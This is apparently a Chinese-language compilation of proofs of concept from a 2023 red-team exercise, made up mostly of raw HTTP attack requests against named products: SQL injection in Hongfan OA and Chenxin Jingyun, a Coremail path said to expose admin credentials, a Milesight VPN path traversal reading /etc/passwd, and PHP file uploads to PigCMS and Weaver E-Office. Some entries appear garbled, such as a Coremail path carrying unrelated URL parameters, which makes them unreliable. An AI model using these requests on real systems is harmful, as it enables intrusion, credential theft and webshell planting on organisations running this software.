0x01 红帆 OA
zyy_AttFile.asmx SQL 注入漏洞
1 2 3 4 5 6 7 8 9 10 11 12 13
| POST /ioffice/prg/interface/zyy_AttFile.asmx HTTP/1.1 Host: 10.250.250.5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Length: 383 Content-Type: text/xml; charset=utf-8 Soapaction: "http://tempuri.org/GetFileAtt" Accept-Encoding: gzip, deflate Connection: close
<?xml version="1.0" encoding="utf-8"?><soap:Envelopexmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <GetFileAttxmlns="http://tempuri.org/"><fileName>123</fileName></GetFileAtt> </soap:Body></soap:Envelope>
|
来源:https://bbs.decoyit.com/thread-597-1-1.html
0x02 Coremail
邮件系统未授权访问获取管理员账密
1 2 3 4
| /coremail/common/assets/:/:/:/:/:/:/s? biz=Mzl3MTk4NTcyNw==&mid=2247485877&idx=1&sn=7e5f77db320ccf9013c0b7aa7262 6688chksm=eb3834e5dc4fbdf3a9529734de7e6958e1b7efabecd1c1b340c53c80299ff5c688b f6adaed61&scene=2
|
来源:https://github.com/ibaiw/2023Hvv/blob/main/Coremail%20%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E8%8E%B7%E5%8F%96%E7%AE%A1%E7%90%86%E5%91%98%E8%B4%A6%E5%AF%86.md
0x03 Milesight VPN
server.js 任意文件读取漏洞
1 2 3 4 5 6
| GET /../etc/passwd HTTP/1.1 Host: Accept: / Content-Type: application/x-www-form-urlencoded
|
来源:https://github.com/ibaiw/2023Hvv/blob/main/Milesight%20VPN%20server.js%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
0x04 PigCMS
action_flashUpload 任意文件上传漏洞
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| POC: POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1 Host: Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=----aaa ------aaa Content-Disposition: form-data; name="filePath"; filename="test.php" Content-Type: video/x-flv <?php phpinfo();?> ------aaa
/cms/upload/images/2023/08/11/1691722887xXbx.php
|
来源:https://github.com/ibaiw/2023Hvv/blob/main/PigCMS%20action_flashUpload%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
0x05
泛微 E-Office CVE-2023-2523/CVE-2023-2648 任意文件上传
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
| POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1 Host: 127.0.0.1 Content-Length: 352 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: null Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 Connection: close ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt Content-Disposition: form-data; name="upload_quwan"; filename="1.php." Content-Type: image/jpeg <?php phpinfo();?> ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt Content-Disposition: form-data; name="file"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
| POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 Host: 127.0.0.1 Content-Length: 204 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: null Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 Connection: close ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt Content-Disposition: form-data; name="Fdiledata"; filename="uploadify.php." Content-Type: image/jpeg <?php phpinfo();?> ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
|
来源:https://blog.csdn.net/qq_41904294/article/details/130832416
0x06
辰信景云终端安全管理系统 login SQL注入漏洞
1 2 3
| POST /api/user/login
captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='
|
来源:https://github.com/ibaiw/2023Hvv/blob/main/%E8%BE%B0%E4%BF%A1%E6%99%AF%E4%BA%91%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20login%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md